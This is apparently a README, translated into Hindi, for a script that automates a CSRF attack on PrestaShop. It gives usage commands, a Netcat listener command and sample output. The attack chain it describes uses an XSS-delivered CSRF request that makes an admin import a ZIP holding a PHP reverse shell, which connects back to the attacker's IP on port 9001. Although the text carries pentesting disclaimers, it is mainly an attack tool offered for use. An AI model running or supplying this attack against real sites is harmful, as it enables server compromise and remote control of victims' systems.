
PrestaShop के लिए एक स्वचालित CSRF शोषण स्क्रिप्ट जो एक तैयार ZIP पेलोड के माध्यम से PHP रिवर्स शेल अपलोड और निष्पादित करती है, कनेक्शन कैप्चर के लिए Netcat लिसनर की आवश्यकता होती है।
यह स्क्रिप्ट एक CSRF (क्रॉस-साइट रिक्वेस्ट फोर्जरी) एक्सप्लॉइट को स्वचालित करती है ताकि लक्ष्य के वेब सर्वर पर एक PHP रिवर्स शेल अपलोड किया जा सके और उसे निष्पादित किया जा सके। रिवर्स शेल को एक तैयार CSRF पेलोड के माध्यम से ZIP फ़ाइल के रूप में वितरित किया जाता है, जो तब ट्रिगर होता है जब कोई विशेषाधिकार प्राप्त उपयोगकर्ता किसी विशिष्ट एंडपॉइंट के साथ इंटरैक्ट करता है। स्क्रिप्ट को रिवर्स शेल कनेक्शन को कैप्चर करने के लिए एक सुनने वाले Netcat इंस्टेंस की आवश्यकता होती है।
फिलहाल टूटा हुआ लगता है, बाद में अपडेट करूंगा
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: लक्ष्य का आधार URL (जैसे, https://example.com)।admin_endpoint: एडमिन थीम इम्पोर्ट एंडपॉइंट का पथ।admin_email: एक प्रशासक का ईमेल पता (पेलोड के लिए स्पूफ करने हेतु)।attacker_ip: वह IP पता जहाँ रिवर्स शेल लिसनर कनेक्शन प्राप्त करेगा।./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip और पोर्ट 9001 के साथ revshells.com का उपयोग करके एक PHP रिवर्स शेल उत्पन्न करता है।love.php) को Love-exploit.zip में संपीड़ित किया जाता है।csrf_payload.html) बनाता है जो रिवर्स शेल को आयात करने के लिए लक्ष्य के एडमिन पैनल में स्वचालित रूप से एक दुर्भावनापूर्ण अनुरोध सबमिट करता है।8000 पर एक अस्थायी HTTP सर्वर Love-exploit.zip को लक्ष्य द्वारा आयात करने के लिए प्रस्तुत करता है।अपनी मशीन पर Netcat लिसनर प्रारंभ करें:
nc -nvlp 9001
स्क्रिप्ट चलाएँ:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
लक्ष्य द्वारा CSRF पेलोड निष्पादित करने और रिवर्स शेल कनेक्शन प्राप्त करने की प्रतीक्षा करें।
स्क्रिप्ट निष्पादन के दौरान निम्नलिखित जानकारी आउटपुट करती है:
8000 (HTTP सर्वर) और 9001 (Netcat लिसनर) खाली हैं।[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
यह दस्तावेज़ नियंत्रित वातावरण में पेनिट्रेशन टेस्टर्स और साइबर सुरक्षा शोधकर्ताओं द्वारा उपयोग के लिए है। इस उपकरण का अनधिकृत उद्देश्यों के लिए दुरुपयोग सख्त वर्जित है।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और कानूनी साइबर सुरक्षा मूल्यांकन के लिए है। बिना अनुमति के किसी सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है और नैतिक दिशानिर्देशों के विरुद्ध है।